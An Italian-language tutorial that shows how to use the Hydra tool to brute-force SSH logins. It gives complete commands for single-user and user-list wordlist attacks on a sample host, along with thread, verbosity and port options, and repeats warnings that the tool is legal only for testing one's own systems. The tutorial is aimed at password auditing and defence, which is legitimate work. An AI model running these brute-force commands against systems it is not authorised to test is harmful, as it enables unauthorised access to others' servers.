Hydra brute force attack

 Hydra

Utilizziamo Hydra per effettuare un Brute Force Attack

Cosa è Hydra ?  Hydra è uno strumento ben conosciuto con il quale è possibile  lanciare attacchi a “forza bruta” brute-force su credenziali di accesso per diversi protocolli.

L’utility Hydra ha la possibilità di ” attaccare ”  i login su una varietà di protocolli differenti , ma in questo caso, andremo a testare la resistenza delle password su SSH.

Attenzione: Hydra è uno strumentoche può essere usato  per attaccare. Si può utilizzare liberamente solo per testare i propri sistemi ! In caso contrario, è illegale !.

"<yoastmark

SSH è presente sulla quasi totalità dei  server Linux o Unix e di solito è il modo principale per gli  amministratori per accedere e gestire i loro sistemi. In questo articolo parlerò di utilizzo di wordlists   “lista di parole”  da fornire a Hydra con le password da testare.  Con le WordList andremo ad effettuare un attacco mirato con un numero definito di parole che comporta una diminuzione della percentuale di riuscita , ma crea sia quel flusso di rete che un alto numero di tentativi di accesso da poter utilizzare per rendere sicuro il nostro server con contromisure attive.

Attenzione:  è uno strumento che può essere usato anche  per attaccare. Si può utilizzare liberamente solo per testare i propri sistemi ! In caso contrario, è illegale !.

1) Andiamo a testare con singolo utente root il protocollo ssh del server 192.168.1.1 con lista presente in /usr/share/lista/password.txt

Comando:

hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh

-l  = parametro che va ad identificare Utente Singolo  ( in questo caso root)

root = variabile , si va a identificare username da attaccare

-P = parametro che va ad identificare un attacco con lista

/usr/share/lista/password.txt = identificazione vocabolario

192.168.1.1 Indirizzo ip del server da attaccare

-t  = parametro che indica a Idra il numero di thread da utilizzare  ( nel nostro caso 4 come suggerisce il manuale di Idra per attacco a ssh)

ssh = Protocollo da attaccare

 

2) Andiamo a testare con utenti multipli prelevati da /usr/share/lista/utenti.txt  il protocollo ssh del server 192.168.1.1 con lista presente in /usr/share/lista/password.txt

Comando:

hydra -L /usr/share/lista/utenti.txt -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh

-L  = lista utenti (L maiuscola)

/usr/share/lista/utenti.txt = identificazione vocabolario

-P = parametro che va ad identificare un attacco con lista

/usr/share/lista/password.txt = identificazione vocabolario

192.168.1.1 Indirizzo ip del server da attaccare

-t  = parametro che indica a Idra il numero di thread da utilizzare  ( nel nostro caso 4 come suggerisce il manuale di Idra per attacco a ssh)

ssh = Protocollo da attaccare

 

Altri parametri.

 -V  or -v

il parametro -V controlla il livello di dettaglio in output di quello che Hydra sta facendo. -V altissimo dettaglio -v medio dettaglio

 

hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 -V ssh

hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 -v ssh

-s

Non e’ detto che un determinato protocollo sia su una porta standard. Molti cambiano le porte per aumentare il livello di sicurezza. Con questo parametro possiamo dire su che porta tentare per il protocollo specificato.

esempio

hydra -s 44 -L /usr/share/lista/utenti.txt -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh

 

p.s.

quindi se tentate su uno dei server che gestisco, al quarto tentativo l’ip attaccante verrà bannato per 15 minuti. Quindi, esiste sempre un metodo per difendersi o almeno tentare di farlo. Basta conoscerlo.

Attenzione: Hydra è uno strumentoche può essere usato  per attaccare. Si può utilizzare liberamente solo per testare i propri sistemi ! In caso contrario, è illegale !.

G.P.